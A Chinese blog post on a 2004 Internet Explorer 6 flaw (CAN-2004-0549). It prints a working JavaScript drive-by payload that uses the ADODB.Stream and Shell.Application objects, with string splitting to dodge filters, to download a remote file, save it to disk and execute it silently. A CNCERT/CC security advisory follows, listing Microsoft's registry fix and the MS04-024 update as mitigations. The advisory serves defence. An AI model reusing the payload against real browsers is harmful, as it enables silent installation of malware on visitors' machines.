因为一些个人的原因好久没有写技术的blog了
最近看到了一个可以用ie的漏洞攻击的办法。在ie 6.0上有效
挺简单的。就是在网页上嵌入一段javascript代码,如果安全权限低的话。可以从网上下载一段文件
到本地执行。。。呵呵。可是想做什么就做什么了....
关于着漏洞的介绍
http://bbs.54master.com/redirect.php?fid=14&tid=122758&goto=nextoldset
(仅是技术讨论,不应该用于其它的目的)
var
url,path;
url
=
"
XXXXXXXXXXXXXXXX
"
;
//
需要下载的文件
path
=
"
KKKKKKKKK
"
;
//
保存在本地的路径
var
ado
=
(document.createElement(
"
object
"
));
var
d
=
1
;
ado.setAttribute(
"
classid
"
,
"
clsid:BD96C556-65A3-11D0-983A-00C04FC29E36
"
);
var
e
=
1
;
var
xml
=
ado.CreateObject(
"
Microsoft.XMLHTTP
"
,
""
);
var
ab
=
"
Adodb.
"
;
var
cd
=
"
Stream
"
;
xml.Open(
"
GET
"
,url,
0
);
xml.Send();
//
创建xmlhttp下载
var
as
=
ado.createobject(ab
+
cd,
""
);
as.type
=
1
;
var
n
=
1
;
as.open();
as.write(xml.responseBody);
as.savetofile(path,
2
);
//
保存到硬盘
as.close();
var
shell
=
ado.createobject(
"
Shell.Application
"
,
""
);
shell.ShellExecute(
"
D:/Downloads/qq2006beta3_PConline.exe
"
,
""
,
""
,
"
open
"
,
0
);
//
执行保存到硬盘的文件
安全公告CN-SA04-34A
发布日期:2004-7-15
安全等级:三级
公开程度:公共
更新说明:
对于近期众所周知的IE漏洞,微软一直未提供补丁,即使在7月份最新的一批安全公告中也没有。但是,微软提供了两个更新方案能够有效降低ADODB.Stream或Shell.Application被用来运行恶意代码的危险。据分析,要成功利用IE漏洞需要IE调用ADODB.Stream或Shell.Application程序。
防止ADODB.Stream被IE调用的解决方案:
这是一个简单的注册表修改程序,能够有效地防止Download.Ject的运行。[下载]
另外,微软提供了Download.Ject清除工具。[下载]
防止Shell.Application被IE调用的解决方案:
除了利用ADODB.Stream运行Download.Ject,调用Shell.Application也能获得同样的效果。因此,微软提供了Windows Shell更新方案。
http://www.microsoft.com/china/technet/Security/bulletin/ms04-024.mspx
上面的更新方案会更改一些系统功能,除了安全公告中提到的以外,还有以下功能更改:
针对Internet Explorer 6 Service Pack 1,它可以防止位于Internet区的浏览用户去本机区访问下载网页。该更改能够降低潜在的新的跨域漏洞的影响,进一步加强了对Internet Explorer 6 Service Pack 1的限制。
限制Shell Automation Service ActiveX控件(shell.application)的功能,安全性得以提高,能够防止潜在的恶意利用。微软认为其是一种深度防御措施。
微软推荐,在XP SP2发布之前,用户使用非XP SP2版本的IE需要采取以下措施提高IE的安全性:
1. 加固本机区(参考 http://support.microsoft.com/default.aspx?scid=KB;EN-US;833633)
2. 安装最新的Outlook Express更新(MS04-018)
3. 使用上面的ADODB.Stream修改程序
4. 安装安全更新(MS04-024)
参考信息:
其他信息:
CVE编号:CAN-2004-0549
首次发布日期:2004-7-15
修订次数:0
安全公告文档编写:
CNCERT/CC
本文介绍了一种通过IE浏览器漏洞进行攻击的方法,并提供了一个具体的JavaScript示例代码来演示如何利用此漏洞从网络下载并执行任意文件。此外,还详细介绍了微软针对此漏洞发布的补丁及其更新方案。
35

被折叠的 条评论
为什么被折叠?



